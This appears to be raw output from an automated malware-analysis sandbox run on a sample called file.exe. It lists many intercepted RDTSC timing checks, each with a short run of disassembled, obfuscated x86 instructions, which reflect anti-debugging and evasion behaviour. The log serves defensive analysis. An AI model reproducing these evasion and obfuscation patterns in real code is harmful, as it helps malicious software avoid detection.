Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10A9628 second address: 10A9630 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10A9630 second address: 10A9635 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10A9A33 second address: 10A9A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10A9BFE second address: 10A9C02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10B3D45 second address: 10B3D4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10B3D4B second address: 10B3D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jp 00007FB0D54BC066h 0x0000000d pop edi 0x0000000e jng 00007FB0D54BC06Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10B2ABC second address: 10B2AC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10B2AC1 second address: 10B2AD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D54BC06Fh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10B2C23 second address: 10B2C2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10B3445 second address: 10B344B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10B344B second address: 10B3455 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB0D4776366h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10B3455 second address: 10B345F instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB0D54BC06Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10B345F second address: 10B347D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FB0D4776377h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10B35EE second address: 10B360D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D54BC077h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10B360D second address: 10B3617 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10B3617 second address: 10B3628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB0D54BC06Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10BBB26 second address: 10BBB42 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FB0D4776372h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10BBB42 second address: 10BBB46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10BBB46 second address: 10BBB4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10BBB4C second address: 10BBB52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10BBB52 second address: 10BBB56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 101F23E second address: 101F242 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 101F242 second address: 101F248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 101F248 second address: 101F250 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 101F250 second address: 101F254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 1072D8B second address: 1072D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 1072D91 second address: 1072DB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov dword ptr [esp], eax 0x00000009 movzx ecx, di 0x0000000c lea eax, dword ptr [ebp+12494AFEh] 0x00000012 jc 00007FB0D477636Ah 0x00000018 mov di, 1CC6h 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 pop eax 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 1072DB4 second address: 1072DBE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB0D54BC066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 1072DBE second address: 1052C0C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB0D477637Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FB0D4776374h 0x00000010 nop 0x00000011 or ch, FFFFFFC7h 0x00000014 mov dx, 4413h 0x00000018 call dword ptr [ebp+122D3219h] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 1072EA7 second address: 1072EAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 1072EAC second address: 1072F54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FB0D4776366h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], ebx 0x00000011 jmp 00007FB0D4776376h 0x00000016 push dword ptr fs:[00000000h] 0x0000001d jnl 00007FB0D4776368h 0x00000023 jns 00007FB0D477636Ch 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 mov di, 674Eh 0x00000034 mov dword ptr [ebp+12494B56h], esp 0x0000003a movsx edi, ax 0x0000003d cmp dword ptr [ebp+122D29C6h], 00000000h 0x00000044 jne 00007FB0D477648Bh 0x0000004a mov edi, dword ptr [ebp+122D1AB9h] 0x00000050 mov byte ptr [ebp+122D3464h], 00000047h 0x00000057 or dword ptr [ebp+12489124h], ecx 0x0000005d mov eax, D49AA7D2h 0x00000062 push 00000000h 0x00000064 push ebp 0x00000065 call 00007FB0D4776368h 0x0000006a pop ebp 0x0000006b mov dword ptr [esp+04h], ebp 0x0000006f add dword ptr [esp+04h], 0000001Ah 0x00000077 inc ebp 0x00000078 push ebp 0x00000079 ret 0x0000007a pop ebp 0x0000007b ret 0x0000007c push eax 0x0000007d push eax 0x0000007e push edx 0x0000007f jng 00007FB0D4776368h 0x00000085 push ecx 0x00000086 pop ecx 0x00000087 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 1072F54 second address: 1072F6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB0D54BC073h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 107318C second address: 1073192 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 1073192 second address: 1073196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 1073342 second address: 1073349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 1073555 second address: 1073559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 1073812 second address: 1073829 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB0D4776368h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007FB0D4776368h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 1073CD2 second address: 1073CD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 1073CD7 second address: 1073CDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 1073F24 second address: 1073F7E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jng 00007FB0D54BC066h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov cx, ax 0x00000010 lea eax, dword ptr [ebp+12494B42h] 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007FB0D54BC068h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 or dword ptr [ebp+122D347Eh], edx 0x00000036 mov dx, D051h 0x0000003a nop 0x0000003b pushad 0x0000003c push edx 0x0000003d push eax 0x0000003e pop eax 0x0000003f pop edx 0x00000040 push edi 0x00000041 pushad 0x00000042 popad 0x00000043 pop edi 0x00000044 popad 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 je 00007FB0D54BC066h 0x0000004f pushad 0x00000050 popad 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 1073F7E second address: 1073FA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jo 00007FB0D4776366h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f mov cx, dx 0x00000012 lea eax, dword ptr [ebp+12494AFEh] 0x00000018 pushad 0x00000019 adc edx, 1DE10ECAh 0x0000001f mov di, dx 0x00000022 popad 0x00000023 nop 0x00000024 push ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 1073FA7 second address: 1073FC4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB0D54BC073h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10BB17E second address: 10BB184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10BB2EB second address: 10BB2FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b js 00007FB0D54BC066h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10BB2FC second address: 10BB30C instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB0D4776366h 0x00000008 js 00007FB0D4776366h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10BB30C second address: 10BB34F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB0D54BC076h 0x00000008 jmp 00007FB0D54BC079h 0x0000000d pushad 0x0000000e popad 0x0000000f jl 00007FB0D54BC066h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB34F second address: 10BB353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB353 second address: 10BB384 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D54BC075h 0x00000007 jmp 00007FB0D54BC06Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jng 00007FB0D54BC06Eh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB384 second address: 10BB3A6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FB0D4776370h 0x00000008 js 00007FB0D4776366h 0x0000000e pop ebx 0x0000000f ja 00007FB0D4776377h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB636 second address: 10BB64A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D54BC070h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB64A second address: 10BB6A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007FB0D4776377h 0x00000010 popad 0x00000011 jmp 00007FB0D4776377h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FB0D4776375h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB6A0 second address: 10BB6A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB6A4 second address: 10BB6A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB6A8 second address: 10BB6AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BDECC second address: 10BDEEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FB0D4776366h 0x0000000a popad 0x0000000b jmp 00007FB0D4776370h 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C130C second address: 10C132B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FB0D54BC075h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8636 second address: 10C8669 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jo 00007FB0D4776366h 0x00000009 pop ebx 0x0000000a jmp 00007FB0D4776370h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FB0D477636Bh 0x00000018 jmp 00007FB0D477636Ah 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8669 second address: 10C866F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C866F second address: 10C8673 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C7195 second address: 10C71B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FB0D54BC06Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jns 00007FB0D54BC066h 0x00000012 jg 00007FB0D54BC066h 0x00000018 pop esi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C72E1 second address: 10C7327 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB0D477637Ah 0x00000008 jmp 00007FB0D4776370h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 jmp 00007FB0D4776374h 0x00000017 pop eax 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10739A6 second address: 10739B5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007FB0D54BC066h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10739B5 second address: 1073A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007FB0D4776368h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 0000001Ah 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 or dword ptr [ebp+122D1AB9h], ecx 0x00000027 mov edi, dword ptr [ebp+122D2BDAh] 0x0000002d mov ebx, dword ptr [ebp+12494B3Dh] 0x00000033 mov edx, 34716F4Eh 0x00000038 add eax, ebx 0x0000003a push 00000000h 0x0000003c push edi 0x0000003d call 00007FB0D4776368h 0x00000042 pop edi 0x00000043 mov dword ptr [esp+04h], edi 0x00000047 add dword ptr [esp+04h], 0000001Dh 0x0000004f inc edi 0x00000050 push edi 0x00000051 ret 0x00000052 pop edi 0x00000053 ret 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 push ecx 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1073A22 second address: 1073A27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1073A27 second address: 1073A2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1073A2D second address: 1073A31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C79DE second address: 10C79EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FB0D4776366h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101BCCB second address: 101BCCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101BCCF second address: 101BCE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D477636Ch 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CB461 second address: 10CB46D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FB0D54BC066h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CB5AE second address: 10CB5C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB0D4776371h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CB887 second address: 10CB8AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jne 00007FB0D54BC066h 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 jc 00007FB0D54BC075h 0x00000019 jmp 00007FB0D54BC06Fh 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D007E second address: 10D0084 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CF4CC second address: 10CF4E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D54BC073h 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CF8F8 second address: 10CF8FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CF8FC second address: 10CF912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FB0D54BC066h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jg 00007FB0D54BC066h 0x00000013 pushad 0x00000014 popad 0x00000015 pop edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CFA58 second address: 10CFA7E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FB0D477636Ah 0x00000008 pop esi 0x00000009 jmp 00007FB0D477636Eh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CFA7E second address: 10CFA82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CFA82 second address: 10CFAA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D477636Ch 0x00000007 jns 00007FB0D4776366h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jp 00007FB0D4776368h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CFAA0 second address: 10CFAB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D54BC06Eh 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CFAB7 second address: 10CFABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D7085 second address: 10D709E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB0D54BC075h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D737D second address: 10D73A8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB0D4776366h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007FB0D4776366h 0x00000016 jmp 00007FB0D4776375h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D7623 second address: 10D7636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FB0D54BC066h 0x0000000a popad 0x0000000b jl 00007FB0D54BC06Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D7636 second address: 10D7644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FB0D4776366h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D7C87 second address: 10D7C8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D7C8B second address: 10D7C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D84DE second address: 10D84E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
